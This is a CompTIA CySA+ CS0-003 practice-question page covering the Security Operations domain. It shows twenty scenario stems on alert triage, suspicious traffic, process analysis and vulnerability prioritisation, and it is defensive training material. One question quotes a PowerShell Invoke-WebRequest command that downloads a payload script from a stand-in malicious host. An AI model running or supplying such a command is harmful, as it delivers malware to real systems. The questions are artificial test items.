CS0-003 · topic practice

Security Operations practice questions

Practise with CompTIA CySA+ CS0-003 Security Operations questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Reviewed by Johnson Ajibi · MSc IT Security
20 questions · Domain: Security Operations

What the exam tests

What to know about Security Operations

Security Operations questions test whether you can apply the concept in context, not just recognise a definition. The questions cover:

  • How the topic appears in realistic exam-style scenarios.
  • Which detail in the question changes the correct answer.
  • How to eliminate plausible but wrong options.
  • How to connect the question back to the wider exam objective.

Watch out for

Common Security Operations exam traps

  • Answering from memory before reading the full scenario.
  • Missing a constraint such as cost, availability, security, scope or command context.
  • Choosing a broad answer when the question asks for the most specific fix.
  • Ignoring why the wrong options are tempting.

Practice set

Security Operations questions

20 questions · select your answer, then reveal the explanation

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

A security analyst is conducting a proactive threat hunt for lateral movement techniques. The analyst examines EDR data for unusual parent-child process relationships. Which three process chains are indicative of lateral movement? (Select THREE.)

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

A security analyst reviews a SIEM alert that fired when a user successfully logged into a server from a remote IP address at 3 AM. The user is a system administrator who often works late. What is the most appropriate initial classification of this alert?

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A security analyst is triaging an alert from the EDR that shows the process 'powershell.exe' with a parent process of 'winword.exe'. The user recently opened a document from an email. What is the most likely explanation?

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?



Frequently asked questions

What does the CS0-003 exam test about Security Operations?
Security Operations questions test whether you can apply the concept in context, not just recognise a definition.

How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.

Can I practise just Security Operations questions in a focused session?
Yes — the session launcher on this page draws every question from the Security Operations domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.

Where can I practise other CS0-003 topics?
Use the topic links above to move to related areas, or go back to the CS0-003 question bank to see all topics.

Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the CS0-003 exam covers. They are not copied from any real exam or dump site.